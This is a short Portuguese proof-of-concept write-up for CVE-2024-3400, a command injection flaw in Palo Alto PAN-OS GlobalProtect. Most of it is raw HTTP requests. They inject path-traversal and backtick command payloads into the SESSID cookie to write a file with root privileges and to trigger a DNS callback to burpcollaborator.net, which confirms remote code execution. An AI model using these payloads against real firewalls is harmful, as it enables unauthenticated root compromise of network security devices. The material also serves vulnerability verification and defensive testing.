
CVE-2024-3400 PAN-OS: Vulnerabilidade de Injeção de Comandos do SO no GlobalProtect
Injeção de Comando no OS Palo Alto
Descrição do Fornecedor
Uma vulnerabilidade de injeção de comando na funcionalidade GlobalProtect do software PAN-OS da Palo Alto Networks para versões específicas do PAN-OS e configurações distintas de funcionalidades pode permitir que um atacante não autenticado execute código arbitrário com privilégios de root no firewall.
Créditos para watchtowr labs 🚀
Requisição HTTP:
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
poc.txt deve ser criado sob este caminho /var/appweb/sslvpndocs/global-protect/portal/images/poc.tx com privilégio de root.
Se vulnerável, você receberá 403 ao acessar poc.txt em vez de 404.
GET /global-protect/portal/images/poc.txt HTTP/1.1
Host: 127.0.0.1
Connection: close
A telemetria deve estar ativada.
Você pode usar o Burp Collaborator para verificação de RCE
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`hostname${IFS}burpcollaborator.net `;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0